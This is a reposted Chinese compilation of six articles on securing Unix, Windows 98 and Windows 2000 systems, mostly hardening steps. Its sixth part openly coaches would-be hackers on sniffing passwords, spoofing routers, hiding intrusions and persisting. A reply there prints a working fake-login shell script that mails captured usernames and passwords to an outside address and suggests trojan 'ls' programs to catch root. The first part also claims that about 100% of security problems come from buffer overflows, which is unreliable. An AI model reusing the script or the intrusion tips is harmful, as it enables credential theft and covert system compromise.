如何保障Unix系统安全Windows系统(合集6篇)由网友“小狗饿霸”投稿提供,下面是小编整理过的如何保障Unix系统安全Windows系统,欢迎大家阅读分享借鉴,欢迎大家分享。
篇1:如何保障Unix系统安全Windows系统
Unix系统的安全等级标准达到C2级,它具有以下安全特征: 1、访问控制 系统通过访问控制表ACL使得用户可以自行改变文件的安全级别和访问权限, 如:-rwxr-xr--1johntest4月9日17:50cm 上面的例子表示文件cm对于用户john来说可读、可写、可执行,对test这个组
Unix系统的安全等级标准达到C2级,它具有以下安全特征:
1、访问控制
系统通过访问控制表ACL使得用户可以自行改变文件的安全级别和访问权限 。
如: -rwxr-xr-- 1 john test 4月9日17:50 cm
上面的例子表示文件cm对于用户john来说可读、可写、可执行,对test这个组的其他用户只有读和执行的权限,而对除此以外的所有用户只有读的权限。系统管理员可用umask命令为每个用户设置默认的权限值,用户可用chmod命令来修改自己拥有的文件或目录的权限。
2、对象的可用性
当一个对象不再使用时,在它回到自由对象之前,TCB (Trusted Computing Base) 将要清除它,以备下次需要时使用。
3、个人身份标识与认证
其目的是为了确定用户的真实身份, 在用户登录时它采用扩展的DES算法对输入的口令进行加密,然后把口令的密文与存放在/etc/password中的数据进行比较,如果二者的值完全相同则允许用户登录到系统中,否则禁止用户的登录。
4、审计记录
Unix系统能够对很多事件进行记录,比如:文件的创建和修改以及系统管理的所有操作和其他有关的安全事件(登录失败,以root身份进行登录的情况),通过这些记录系统管理员就可以对安全问题进行跟踪。
5、操作的可靠性
操作的可靠性是指Unix系统用于保证系统的完整性的能力。Unix系统通过对用户的分级管理,通过对运行级别的划分,以及前面提到的访问控制加之自带的一些工具,能够很好地保证系统操作的可靠性。
Unix的安全体系结构
Unix的安全体系结构可以按照ISO/OSI网络模型的层次结构将它分成七层,如下表所示:
层次 名称 含义
7 Policy 安全策略定义、指导
6 Personnel 使用设备和数据的人员
5 LAN 计算机设备和数据
4 Internal Demark 内部区分
3 Gateway OSI中第7、6、5、4层的功能
2 Packet-Filter OSI中第3、2、1层的功能
1 External Demark 外部连接
1、Policy(策略层)
在这一层中,主要定义了一个组织的安全策略,包括安全策略的需求分析、安全方针的制定,也包括了高层次定义的允许的安全风险以及下层的如何配置设备及过程。
2、Personnel (用户层)
本层定义了Unix的安装、操作、维护和使用以及通过其他方法访问网络的人员。从广义上讲, 对Unix多用户环境下的应用进程也应算在其中。此层的安全策略应该反映出用户对总体系统安全的期望值。
3、LAN(局域网层)
它定义用户的安全程序要保护的设备和数据,包括计算机互联的设备。如:路由器、单一的Unix主机等。
4、Internal Demark (内部区分层)
这一层定义了用户如何将局域网连接到广域网以及如何将局域网连接到防火墙上。
5、Gateway (嵌入的Unix网关层)
本层定义了整体平台包括第四层的网络接口以及第三层的路由器。它用于为广域网提供防火墙服务。
6、Packet-Filter (包过滤层)
它对应于OSI的第一层到第三层,本层不仅提供第一层的物理连接,更主要的是根据安全策略, 通过用户层的进程和包过滤规则对网络层中的IP包进行过滤。一般的包过滤算法是采用查规则表来实现的,它根据“条件/动作”这样的规则序列来判断是前向路由还是扔包。
7、External Demark (外部连接层)
它定义用户系统如何与设备、电话线路或其他用户不能直接控制的媒介进行连接。完整的用户安全策略应包括这一部分,因线路本身可能允许非授权访问。
Unix系统不安全的因素
尽管Unix系统有比较完整的安全体系结构,但它仍然存在很多不安全的因素,主要表现在以下几个方面:
1、 特权软件的安全漏洞
程序员在编写特权代码或suid代码时,如果没能确保用户对程序执行环境的完全控制,或者对所有返回的错误状态没能给予适当的处理,导致入侵者控制程序的运行环境,使得用户的程序出现不可预期的结果,从而威胁系统的安全。
2、研究源代码的漏洞
由于一些程序本身存在着安全漏洞(如缓冲区溢出),入侵者往往通过这些漏洞来对系统进行攻击,
3、特洛伊木马
特洛伊木马与用户一般要执行的程序从表面上(如文件名等)看很相似,实际上却完成其他的操作,如删除文件、窃取密码和格式化磁盘等,到用户发现时,为时已晚。
4、网络监听及数据截取
计算机安全面临的另一个重要威胁是计算机之间传输的数据可以很容易地被截取。由于异种机的互连,敏感数据传输处于系统的控制之外,有许多现成的软件可以监视网络上传输的数据。
5、软件之间相互作用和设置
由于大型系统软件通常由很多人共同协作完成因此无法准确预测系统内每个部分之间的相互作用。例如/bin/login, 它可接收其他一些程序的非法参数,从而可使普通用户成为超级用户。另一方面,系统软件配置的复杂性,以至简单的配置错误可能导致不易觉察的安全问题。
安全管理
Unix系统安全包括物理安全和逻辑安全,因此与其相对应有物理安全的管理和逻辑安全的管理,下面只针对Unix逻辑安全的管理,从三个方面对此进行论述。
1、防止未授权存取
防止未授权的人进入系统,这是Unix安全管理最重要的问题。新版Unix提供了专门的鉴别系统,如SUN Solaris使用DES密码机构和公共关键字密码,该系统极大地提高了网络环境的安全性。要使Unix鉴别机制更充分地发挥作用,必需加强用户的安全意识和良好的口令管理,进行用户和网络活动的周期检查。
2、防止泄密
就是防止已授权或未授权用户间相互存取或交换对方的重要信息,如用户文件及各种日志文件(如各种log文件)。为此,必须加强对重要文件的访问控制和管理,对系统文件和其他重要文件(如用户root的文件)的属性一定要作安全设置。
3、防止用户拒绝系统的管理
Unix系统不应被一个有意试图使用过多资源的用户损坏。由于Unix不能很好地限制用户对资源的使用,因此,系统管理员需要用ps、df和du命令周期性地检查系统,以便能够查出过多占用CPU资源的进程和大量占用磁盘空间的文件和用户。
保障Unix安全的具体措施
针对比较突出的安全问题,提出了下面一些具体的措施。
1、防止缓冲区溢出
据统计,约100%的安全问题来自缓冲区溢出。攻击者通过写一个超过缓冲区长度的字符串,然后植入到缓冲区,可能会出现两个结果,一是过长的字符串覆盖了相邻的存储单元,引起程序运行失败,严重的可导致系统崩溃;另有一个结果就是利用这种漏洞可以执行任意指令,甚至可以取得系统root特级权限。一些版本的Unix系统(如Solaris 2.6和Solaris 7)具备把用户堆栈设成不可执行的功能,以使这种攻击不能得逞。以下是让这个功能生效的步骤:
1)变成root
2)对/etc/system文件做个拷贝 cp /etc/system /etc/system.BACKUP
3)用编辑器编辑/etc/system文件
4)到文件的最后,插入以下几行:
set noexec_user_stack=1
set noexec_user_stack_log=15
5)保存文件,退出编辑器后,重启机器,以使这些改变生效。可能有些合法使用可执行堆栈的程序在做如上改变后不能正常运行,不过这样的程序并不多。
2、在.netd.conf中关闭不用的服务
Unix系统中有许多用不着的服务自动处于激活状态。它们中可能存在的安全漏洞使攻击者甚至不需要账户就能控制机器。为了系统的安全,应把该关的功能关闭,该限制的文件限制访问权限。可以用如下方法来关闭:
1)变成root
2)备份inetd的配置文件/etc/inetd.conf
cp /etc/inetd.conf /etc/inetd.conf.BACKUP
3)编辑/etc/inetd.conf文件
以“#”符号注释掉不需要的服务,使其处于不激活的状态。在确实需要很高安全的机器上,最好注释掉telnet和ftp,即使要使用此两项服务,也要对使用情况进行限制,如用TCP Wrapper对使用telnet或ftp的IP地址进行限制。
4)在改变/etc/inetd.conf后,找到inetd进程的id号,用kill向它发送HUP信号来刷新它。一定要确保kill了inetd进程后,它还在运行。
3 、给系统打补丁
Unix系统被发现的漏洞,几乎都有了相应的补丁程序。因此,系统管理员需对系统漏洞做及时的修补。软件公司都会定期提供补丁。
4、重要主机单独设立网段
从安全角度考虑,经常做telnet、ftp等需要传送口令的重要机密信息应用的主机应该单独设立一个网段, 以避免某一台个人机被攻破,被攻击者装上sniffer, 造成整个网段通信全部暴露。
5、定期检查
定期检查系统日志文件,在备份设备上及时备份。定期检查关键配置文件(最长不超过一个月)。
重要用户的口令应该定期修改(不长于三个月),不同主机使用不同的口令。
[b:82f0f4736e][/b:82f0f4736e]
liugr3988 回复于:-05-16 19:49:18好文章,支持
纳兰婷 回复于:2004-05-16 20:35:06装上sniffer, 造成整个网段通信全部暴露。有这么可怕
原文转自:www.ltesting.net
篇2:Windows 98系统安全大放送Windows系统
应该准备好系统策略编辑器―POLEDIT.EXE,在光驱中装入你的 Windows 98光盘,它位于Windows 98光盘的TOOLS\RESKIT\NETAD MI N\POLEDIT目录下。策略编辑器的功能也可以通过修改注册表来实现。为了那些没有策略编辑器的朋友,本文将在策略编辑器修改法后给出相
应该准备好系统策略编辑器―POLEDIT.EXE。在光驱中装入你的Windows98光盘,它位于Windows 98光盘的TOOLS\RESKIT\NETADMIN\POLEDIT目录下。策略编辑器的功能也可以通过修改注册表来实现。为了那些没有策略编辑器的朋友,本文将在策略编辑器修改法后给出相应的用注册表编辑器来修改的方法。
首先,你应该根据你的具体情况来为系统使用者划分不同的等级。一般来说,可以将使用者划分为三个等级――超级用户、普通用户和非法用户。要为用户划分等级,必须先生成用户。进入控制面板,双击“用户”,点击“新用户”按钮,按照向导指示输入用户名和相应口令,然后在“个性化项目设置”将全部项目复选框选中,再单击“完成”按钮,至此,一个新用户就生成了。重复以上步骤,再生成一个用户。然后进入“控制面板”下“网络”下“选择主网络登录”项,选择“Windows 友好登录”,确定后重新启动系统,用你的超级用户名和相应口令登录。设置超级用户。大家都知道Windows 9x在退出系统时会自动保存当前工作状态,这是一个很好的功能。但在多用户环境下会给系统的安全带来问题,所以我们必须关闭这个功能。运行POLEDIT.EXE,在文件菜单中选择“打开注册表”,双击“本地用户”,打开“外壳”文件夹,选中“限制”下的“退出时不保存设置”复选框。(在HKEY_CURRENT_USER\SoftWare\Microsoft\Windows\
CurrentVersion\Policies \Explorer主键下建DWORD值NoSaveSettings,将其赋值为01,表示退出时不保存设置。)这样,你的超级用户就设置好了。(为方便起见,在下文中用****来代替HKEY_CURRENT_USER\SoftWare \Microsoft\Windows\CurrentVersion主键)
重新启动系统,用普通用户名和口令登录,运行系统策略编辑器,让我们接着设置普通用户的权限。对于普通用户来说,他可以正常的使用系统,但不允许更改系统的设置(如改变系统配置或改变系统策略),所以我们进行以下操作:
①进入“控制面板”文件夹,选中“显示器”下“限制‘显示器’控制面板”复选框,再选中其下的“禁用‘显示器’控制面板”复选框( 在****\Policies\System主键下建DWORD值NoDispCPL,将其赋值为01,表示禁用“显示器”控制面板)、“隐藏背景页”复选框( 在****\Policies\System主键下建DWORD值NoDispBackgroundPage,将其赋值为01,表示隐藏背景页)、“隐藏屏幕保护程序页”复选框( 在****\Policies\System主键下建DWORD值NoDispScrSavPage,将其赋值为01,表示隐藏屏幕保护程序页)、“隐藏外观页”复选框( 在****\Policies\System主键下建DWORD值NoDispAppearancePage,将其赋值为01,表示隐藏外观页)。
②在“控制面板”文件夹下选中“网络”下“限制‘网络’控制面板复选框,再选中其下的“禁用‘网络’控制面板”复选框(在****\Policies\Network主键下建DWORD值NoNetSetup,将其赋值为01,表示禁用“网络”控制面板)、“隐藏标识页”复选框(在****\Policies\Network主键下建DWORD值NoNetSetupIDPage,将其赋值为01,表示隐藏标识页)、“隐藏访问控制页”( 在****\Policies\Network主键下建DWORD值NoNetSetupSecurityPage,将其赋值为01,表示隐藏访问控制页)
③在“控制面板”文件夹下选中“口令”下“隐藏‘口令’控制面板”复选框,再选中其下的“禁用‘口令’控制面板”复选框(在****\Policies\System主键下建DWORD值NoSecCPL,将其赋值为01,表示禁用“口令”控制面板)、“隐藏更改口令页”复选框(在****\Policies\System主键下建DWORD值NoPwdPage,将其赋值为01,表示隐藏更改口令页)、“隐藏远程管理页”复选框( 在****\Policies\System主键下建DWORD值NoAdminPage,将其赋值为01,表示隐藏远程管理页)、“隐藏用户配置文件页”复选框(在****\Policies\System主键下建DWORD值NoProfilePage,将其赋值为01,表示隐藏用户配置文件页),
④在“控制面板”文件夹下选中“打印机”下“限制打印机设置”, 再选中其下的“隐藏常规和详细资料页”复选框(在****\Policies\Explorer主键下建DWORD值NoPrinterTabs,将其赋值为01,表示隐藏常规和详细资料页)、“禁止删除打印机”复选框(在****\Policies\Explorer主键下建DWORD值NoDeletePrinter,将其赋值为01,表示禁止删除打印机)、“禁止填加打印机”复选框(在****\Policies\Explorer主键下建DWORD值NoAddPrinter,将其赋值为01,表示禁止添加打印机)。
⑤在“控制面板”文件夹下选中“系统”下“限制‘系统’控制面板”,再选中其下的“隐藏设备管理页”复选框(在****\Policies\Syetem主键下建DWORD值NoDevMgrPage,将其赋值为01,表示隐藏设备管理页)、“隐藏硬件配置文件页”复选框(在****\Policies\Syetem主键下建DWORD值NoConfigPage,将其赋值为01,表示隐藏硬件配置文件页)、“隐藏‘文件系统’按钮”复选框(在****\Policies\Syetem主键下建DWORD值NoFileSysPage,将其赋值为01,表示隐藏“文件系统”按钮)、“隐藏‘虚拟内存’按钮”复选框(在****\Policies\Syetem主键下建DWORD值NoVirtMemPage,将其赋值为01,表示隐藏“虚拟内存”按钮)。
⑥在“外壳”文件夹下选中“自定义文件夹”下“自定义‘程序’文件夹”复选框,在“‘程序’项目所在的路径”中输入指定的路径(在****\CurrentVersion\Explorer\User Shell Folders主键下建串值Programs,赋值为一路径,即可自定义“程序”文件夹)。选中“自定义桌面图标”复选框,在“桌面图标所在的路径”中输入指定的路径(****\CurrentVersion\Explorer\User Shell Folders主键下建串值Desktop,赋值为一路径,即可自定义桌面图标)。选中“自定义‘启动’文件夹”复选框,在“‘启动’项目所在的路径”中输入指定的路径(****\CurrentVersion\Explorer\User Shell Folders主键下建串值Startup,赋值为一路径,即可自定义“启动”文件夹)。选中“自定义‘开始’菜单”复选框,在“‘开始’菜单项目所在的路径”中输入指定的路径(****\CurrentVersion\Explorer\User Shell Folders主键下建串值Start Menu,赋值为一路径,即可自定义“开始”菜单)。
⑦在“外壳”文件夹下选中“限制”下“删除‘运行’命令”复选框(在****\Policies\Explorer主键下建DWORD值NoRun,将其赋值为01,表示删除“运行”命令)。选中“删除‘查找’命令”复选框(在****\Policies\Explorer主键下建DWORD值NoFind,将其赋值为01,表示删除“查找”命令)。选中“在‘我的电脑’中隐藏驱动器”复选框(在****\Policies\Explorer主键下建DWORD值NoDrives,将其赋值为0x03ffffff,表示在“我的电脑”中隐藏驱动器)。
⑧在“系统”文件夹下选中“限制”下“禁用注册表编辑工具”复选框(在****\Policies\Syetem主键下建DWORD值DisableRegistryTools,将其赋值为01,表示禁用注册表编辑工具)。选中“禁用MS-DOS方式”复选框(在****\Policies主键下建WinOldApp主键,再在其下建DWORD值Disabled,将其赋值为01,表示禁用MS-DOS方式)。选中“禁用单一模式的MS-DOS应用程序”复选框(在****\Policies\WinOldApp主键下建DWORD值NoRealMode,将其赋值为01,表示禁用单一模式的MS-DOS应用程序)。至此,普通用户的权限就设置好了。
重新启动系统,在登录菜单按“ESC”键或“取消”键,以非法用户身份登录入系统,运行策略编辑器,在“外壳”文件夹下选中“限制”下“隐藏桌面上的所有程序项”复选框(在****\Policies\Explorer主键下建DWORD值NoDesktop,将其赋值为01,表示隐藏桌面上的所有程序项且取消右键单击桌面菜单)。选中“从‘开始’菜单上的‘设置’中删除任务栏”复选框(在****\Policies\Explorer主键下建DWORD值NoSetTaskbar,将其赋值为01,表示从“开始”菜单上的“设置”中删除任务栏且取消右键单击任务栏菜单)。选中“禁用‘关闭系统’命令”复选框(在****\Policies\Explorer主键下建DWORD值NoClose,将其赋值为01,表示禁用“关闭系统”命令)。在“系统”文件夹下选中“限制”下的“只能运行允许的Windows应用程序”复选框(在****\Policies\Syetem主键下建DWORD值RestrictRun,将其赋值为01,表示只能运行允许的Windows应用程序)。
原文转自:www.ltesting.net
篇3:Windows 的系统安全防范对策Windows系统
由于Win2000操作系统良好的 网络 功能,因此在因特网中有部分网站 服务器 开始使用的Win2000作为主操作系统的,但由于该操作系统是一个多用户操作系统, 们为了在攻击中隐藏自己,往往会选择Win2000作为首先攻击的对象。那么,作为一名Win2000用户,我们
由于Win2000操作系统良好的网络功能,因此在因特网中有部分网站服务器开始使用的Win2000作为主操作系统的。但由于该操作系统是一个多用户操作系统, 们为了在攻击中隐藏自己,往往会选择Win2000作为首先攻击的对象。那么,作为一名Win2000用户,我们该如何通过合理的方法来防范Win2000的安全呢?下面笔者搜集和整理了一些防范Win2000安全的几则措施,现在把它们贡献出来,恳请各位网友能不断补充和完善。
1、及时备份系统
为了防止系统在使用的过程中发生以外情况而难以正常运行,我们应该对Win2000完好的系统进行备份,最好是在一完成Win2000系统的安装任务后就对整个系统进行备份,以后可以根据这个备份来验证系统的完整性,这样就可以发现系统文件是否被非法修改过。如果发生系统文件已经被破坏的情况,也可以使用系统备份来恢复到正常的状态。备份信息时,我们可以把完好的系统信息备份在CD-ROM光盘上,以后可以定期将系统与光盘内容进行比较以验证系统的完整性是否遭到破坏。如果对安全级别的要求特别高,那么可以将光盘设置为可启动的并且将验证工作作为系统启动过程的一部分。这样只要可以通过光盘启动,就说明系统尚未被破坏过。
2、设置系统格式为NTFS
安装Win2000时,应选择自定义安装,仅选择个人或单位必需的系统组件和服务,取消不用的网络服务和协议,因为协议和服务安装越多,入侵者入侵的途径越多,潜在的系统安全隐患也越大。选择Win2000文件系统时,应选择NTFS文件系统,充分利用NTFS文件系统的安全性。NTFS文件系统可以将每个用户允许读写的文件限制在磁盘目录下的任何一个文件夹内,而且Win2000新增的磁盘限额服务还可以控制每个用户允许使用的磁盘空间大小。
3、加密文件或文件夹
为了防别人偷看系统中的文件,我们可以利用Win2000系统提供的加密工具,来保护文件和文件夹。其具体操作步骤是,在“Win 资源管理器”中,用鼠标右键单击想要加密的文件或文件夹,然后单击“属性”。单击“常规”选项卡上的“高级”,然后选定“加密内容以保证数据安全”复选框。
4、取消共享目录的EveryOne组
默认情况下,在Win2000中新增一个共享目录时,操作系统会自动将EveryOne这个用户组添加到权限模块当中,由于这个组的默认权限是完全控制,结果使得任何人都可以对共享目录进行读写。因此,在新建共享目录之后,要立刻删除EveryOne组或者将该组的权限调整为读取。
5、创建紧急修复盘
如果系统一不小心被破坏而不能正常启动时,就需要专用的Win2000系统启动盘,为此我们一定要记得在Win2000安装完好后创建一个紧急修复磁盘。在创建该启动盘时,我们可以利用Win2000的一个名为NTBACKUP.EXE的工具来实现。运行NTBACKUP.EXE,从工具栏中选择“创建紧急修复盘Create an Emergency Repair Disk”在A:驱动器中插入一张空白格式化的软盘,并点击“确定”,点击“确定”到达完成信息,再点击“确定”。修复盘不再可以用来恢复用户帐号信息等,而且您必须备份/恢复Active Directory,在备份中将被覆盖。
6、改进登录服务器
将系统的登录服务器移到一个单独的机器中会增加系统的安全级别,使用一个更安全的登录服务器来取代Win2000自身的登录工具也可以进一步提高安全,
在大的Win2000网络中,最好使用一个单独的登录服务器用于登录服务。它必须是一个能够满足所有系统登录需求并且拥有足够的磁盘空间的服务器系统,在这个系统上应该没有其它的服务运行。更安全的登录服务器会大大削弱入侵者透过登录系统窜改日志文件的能力。
7、使用好安全机制
严格设计管理好Win2000系统的安全规则,其内容主要包括“密码规则”、“账号锁定规则”、“用户权限分配规则”、“审核规则”以及“IP安全规则”。对全部用户都应按工作需要进行分组,合理对用户分组是进行系统安全设计的最重要的基础。利用安全规则可以限定用户口令的有效期、口令长度。设置登录多少次失败后锁定工作站,并对用户备份文件和目录、关机、网络访问等各项行为进行有效控制。
8、对系统进行跟踪记录
为了能密切地监视 的攻击活动,我们应该启动Win2000的日志文件,来记录系统的运行情况,当 在攻击系统时,它的蛛丝马迹都会被记录在日志文件中的,因此有许多 在开始攻击系统时,往往首先通过修改系统的日志文件,来隐藏自己的行踪,为此我们必须限制对日志文件的访问,禁止一般权限的用户去查看日志文件。当然,系统中内置的日志管理程序功能可能不是太强,我们应该采用专门的日志程序,来观察那些可疑的多次连接尝试。另外,我们还要小心保护好具有根权限的密码和用户,因为 一旦知道了这些具有根权限的帐号后,他们就可以修改日志文件来隐藏其踪迹了。
9、使用好登录脚本
制定系统策略和用户登录脚本,对网络用户的行为进行适当的限制。我们可以利用系统策略编辑器和用户登录脚本为用户设定工作环境,控制用户在桌面上进行的操作,控制用户执行的程序,控制用户登录的时间和地点(如只允许用户在上班时间、在自己办公室的机器上登录,除此以外一律禁止访问),采取以上措施可以进一步增强系统的安全性。
10、经常检查系统信息
如果在工作的过程中突然觉得计算机工作不对劲时,仿佛感觉有人在遥远的地方遥控你。这时,你必须及时停止手中的工作,立即按Ctrl+Alt+Del复合键来查看一下系统是否运行了什么其他的程序,一旦发现有莫名其妙的程序在运行,你马上停止它,以免对整个计算机系统有更大的威胁。但是并不是所有的程序运行时出现在程序列表中,有些程序例如Back Orifice(一种 的后门程序)并不显示在Ctrl+Alt+Del复合键的进程列表中,最好运行“附件”/“系统工具”/“系统信息”,然后双击“软件环境”,选择“正在运行任务”,在任务列表中寻找自己不熟悉的或者自己并没有运行的程序,一旦找到程序后应立即终止它,以防后患。
11、对病毒的袭击要警惕
如今病毒在因特网上传播的速度越来越快,为防止主动感染病毒,我们最好不要在Win2000中上网访问非法网站,不要贸然下载和运行不名真相的程序。例如如果你收到一封带有附件的电子邮件,且附件是扩展名为EXE一类的文件,这时千万不能随意运行它,因为这个不明真相的程序,就有可能是一个系统破坏程序。攻击者常把系统破坏程序换一个名字用电子邮件发给你,并带有一些欺骗性主题,骗你说一些:“这个东西将给您带来惊喜”,“帮我测试一下程序”之类的话。你一定要警惕了!对待这些表面上很友好、跟善意的邮件附件,我们应该做的是立即删除这些来历不明的文件。
12、设置好系统的安全参数
充分利用NTFS文件系统的本地安全性能,设计好NTFS文件系统中文件和目录的读写、访问权限,对用户进行分组。对不同组的用户分别授予拒绝访问、读取和更改权限,一般只赋予所需要的最小的目录和文件的权限。值得注意的是对完全控制权限的授予应特别小心。对于网络资源共享,更要设计好文件系统的网络共享权限,对不应共享的文件和目录决不能授予共享权限。对能够共享的文件和目录,应对不同的组和用户分别授予拒绝访问、读、更改和完全控制等权限。
原文转自:www.ltesting.net
篇4:Windows系统安全模式妙用
Windows系统安全模式妙用!
经常使用电脑的人可能都听说过,当电脑出了故障时,Windows会提供一个名为安全模式的平台,在这里用户能解决很多问题--不管是硬件(驱动)还是软件的,然而你会使用这个安全模式么?今天我们就来带您认识一下它的真面目。
初识安全模式
要进入安全模式,只要在启动时不停地按F8,就会出现选项菜单,再用键盘上的上下光标键进行选择即可进入不同的启动模式。选项菜单包括了以下几个:
1.安全模式
只使用基本文件和驱动程序。如鼠标(USB串行鼠标除外)、监视器、键盘、硬盘、基本视频、默认系统服务等,但无网络连接。
如果采用安全模式也不能成功启动计算机,则可能需要使用恢复控制台功能来修复系统。
2.带网络连接的安全模式
在普通安全模式的基础上增加了网络连接。但有些网络程序可能无法正常运行,如MSN等,还有很多自启动的应用程序不会自动加载,如防火墙、杀毒软件等。所以在这种模式下一定不要忘记手动加载,否则恶意程序等可能会入侵在你修复电脑的过程中。
3.带命令行提示符的安全模式
只使用基本的文件和驱动程序来启动,在登录之后,屏幕上显示命令提示符,而非Windows图形界面。
说明:在这种模式下,如果你不小心关闭了命令提示符窗口,屏幕会全黑。可按下组合键Ctrl+Alt+Del,调出任务管理器,单击新任务,再在弹出对话框的运行后输入C:\WINDOWS\explorer.exe,可马上启动Windows XP的图形界面,与上述三种安全模式下的界面完全相同。如果输入c:\windows\system32\cmd也能再次打开命令提示符窗口。事实上,在其它的安全模式甚至正常启动时也可通过这种方法来启动命令提示符窗口。
4.启用启动日志
以普通的安全模式启动,同时将由系统加载(或没有加载)的所有驱动程序和服务记录到一个文本文件中。该文件称为 ntbtlog.txt,它位于 %windir% (默认为c:\windows\)目录中。启动日志对于确定系统启动问题的准确原因很有用。
5.启用VGA模式
利用基本VGA驱动程序启动。当安装了使Windows不能正常启动的新视频卡驱动程序时,这种模式十分有用。事实上,不管以哪种形式的安全模式启动,它总是使用基本的视频驱动程序,
因此,在这些模式下,屏幕的分辨率为640480且不能改动。但可重新安装驱动程序。
6.最后一次正确的配置
使用Windows上一次关闭时所保存的注册表信息和驱动程序来启动 。最后一次成功启动以来所作的任何更改将丢失。因此一般只在配置不对(主要是软件配置)的情况下,才使用最后一次正确的配置。但是它不能解决由于驱动程序或文件被损坏或丢失所导致的问题。
7.目录服务恢复模式
这是针对服务器操作系统的,并只用于恢复域控制器上的SYSVOL目录和Active Directory目录服务。
8.调试模式
启动时通过串行电缆将调试信息发送到另一台计算机。
如果正在或已经使用远程安装服务在您的计算机上安装 Windows,则您可以看到与使用远程安装服务还原或恢复系统相关的附加选项。
现实应用
1.笔者过去用的是一款旧显示器,又是初学者,初学者最爱干的是什么,换点墙纸,设一下分辨率也觉得很有成就感,没想到误将分辨率和刷新率调得太高,下次启动时屏幕花屏,害得的重新安装了操作系统才算了事。
现在想起来那时也真的傻瓜可爱,只要将其重启到安全模式(前四种模式都行)下,删除显卡驱动程序,再重启电脑即可,重启(正常启动)时,系统会自动扫描显卡并安装驱动程序,屏幕即可恢复正常显示。
还有些问题也可用这种方法来处理,比如Windows XP会自动识别硬件并安装驱动程序,但有时总是老眼昏花,而且在设备管理器下不会显示出错信息。但就是工作不正常,如上不了网(网卡驱动有错)、屏幕显示不对(显卡驱动有错)等,也可在安全模式重新安装驱动程序。
2.揪出恶意的自启动程序或服务
如果电脑出现一些莫明其妙的错误,比如上不了网,按常规思路又查不出问题,可启动到带网络连接的安全模式下看看,如果在这里能上,则说明是某些自启动程序或服务影响了网络的正常连接。
可在带网络连接的安全模式下,用带重定向的命令提示符工具TaskList d:\Anquan.txt将当时的进程记录到D:盘根目录下的文本文件 Anquan.txt中。接着,以正常的方式启动电脑,将Anquan.txt中记录到的进程与此时的进程进行比较,你会发现此时的进程要多得多,请逐个结束多出来的进程,并检查网络连接是否正常。如果结束到某一进程时网络连接正常了,则说明就是刚结束的进程就是罪魁祸首。查出后,可删除与进程相关的可执行文件。但还要注意的是,由于它是自动运行的,强行删除后,可能会引起启动时报找不到某文件的错误,还得将其与自启动有关的设置全部清除,包括系统配置实用程序的启动、Win.ini下的内容、注册表下的内容、启动脚本下的内容、开始菜单启动下的内容等。
篇5:........Windows系统
........
CNL 回复于:-10-21 16:28:36谢谢共享,需要的快看啦!
AnEagle 回复于:2004-10-27 17:21:25具体的实施步骤和分析见“濉溪县农信联社业务网主机系统性能优化实施方案”
楼主太幽默了,在哪里找到的?
zhaobincn 回复于:2004-11-07 02:26:00SKKEEP兄弟 你已收藏完了吧
zhyesno 回复于:2004-11-07 08:44:29呵呵,收藏一下,
........Windows系统
,
。。:)
原文转自:www.ltesting.net
篇6:UNIX系统安全2Windows系统
当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”,他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网络的安全程度定义为该网络被攻击成功的可
当你为用户精心设计了一系列安全措施后,用户总会觉着有点“玄”。他凭什么为这样的网络就是“安全”的呢?是根据设计方案的厚度?还是他为此所花的钱数?到底如何评价一个网络的安全性呢?曾听说过这样的定义:“网络的安全程度定义为该网络被攻击成功的可能性”,听起来倒是蛮有哲理味儿的,可如何实际操作呢?计算机系统的安全程度可以用“橘皮书”的定义来评价,网络系统是不是也可以搞出个“橘皮书”什么的呢?
当你左一层右一层地对信息加密时,心里也许认为层数越多就越安全。但事实是不是真的这样呢?当你又加了一层密时,到底增加了多少的安全性呢?
“喏,你看....”,你指着自己的设计对用户说“即使有人突破了第一道防线,我们还有第二道防线呢。即使第二道也被突破,我们仍然有第三道、第四....”。可怜的用户望着得意洋洋的你,心里不禁嘀咕:“干嘛搞这么复杂....真的非这样不可吗?我可是只是想保证两个星期的安全性啊。”
为了防止大灰狼进来,小猪们把门窗都横七竖八地钉了个死死的。可是大灰狼会不会从别处进来呢?比如说....壁炉的烟囱!聪明的小猪们在壁炉里烧起了一锅开水....。小猪们是聪明的,我们的系统管理员们呢?
计算机系统的安全性依靠一种“访问控制模型”来进行。有没有可能建立一个“网络安全模型”并对它进行形式化的证明,以便从理论上深入开展网络安全的研究?这样就可以摆脱目前的被动地“打补丁”的做法。
网络入侵和网络安全是一对矛盾,没有Hacker高手就不会有好的安全系统。这听起来有些悲哀,可惜是事实。为了提高我们的安全防范能力,我看是不是先培养一批Hacker出来(中国的Hacker太少了)。在此提供几条线索供Hacker们参考:
用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户的口令(当然包括超级用户的)。
sendmail 5.5.9版本以前有个debug命令, 是个强有力的远程调试工具,可惜也是一个大bug。
冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然OSPF协议中有关于身份认证的部分,但很少有人用到。
NFS、NIS都是不太安全的。
1988年的WORM网络病毒最厉害的地方并不是传说中的利用 sendmail的缺陷,而是对看来毫无破绽的finger的攻击!
很多系统管理员为了关机方便而设立了halt之类的特殊用户, 怎样利用这一点来攻击呢?
侵入了一个系统之后,如何“打扫战场”让管理员看不出来? 如何潜伏下来以致于管理员除了重新安装系统,别无清除的办法呢?
....
这些东西都不是我凭空想象的,国外的Hacker们就是这么做的(他们还有很多更厉害的招数呢),
很多东西我也不知道该怎么做,Hacker们自己努力吧。
1-----
: 1).用过Solaris的snoop命令吗? 用它可以“听到”同一共享网段内的其他用户: 的口令(当然包括超级用户的)。
: 3).冒充路由器可以看到所有往来的信息,RIP协议没有身份认证的部分,虽然: OSPF协议中有关于身份认证的部分,但很少有人用到。
这两个是取得口令的最简洁之法, 呵呵. ------- 我也有一简洁之法:
把下面的shell 命令用 ksh 运行
clear
stty ignbrk
echo “login:\c”
read logname
stty -echo
echo “password:\c”
read passwd
print “\nLogin incorrect\n”
print $logname $passwd | mail cxterm.bbs@jet.ncic.ac.cn
stty 0
stty echo
exit
-----
嗯,是一种方法,但必须你能访问对方的机器才能偷到口令。常用的方法
还有在自己能用的目录里放上叫 “ls” “grep” 之类的程序, 希望 root能不小心运行到她们, 一旦获得 root 权限, 呵呵, 下面的我就不用说了. 所以 root 的PATH里不应当有 . (当前目录).
更彻底的方法就是根据passwd文件里面的密文算口令的明文, 我曾经编过
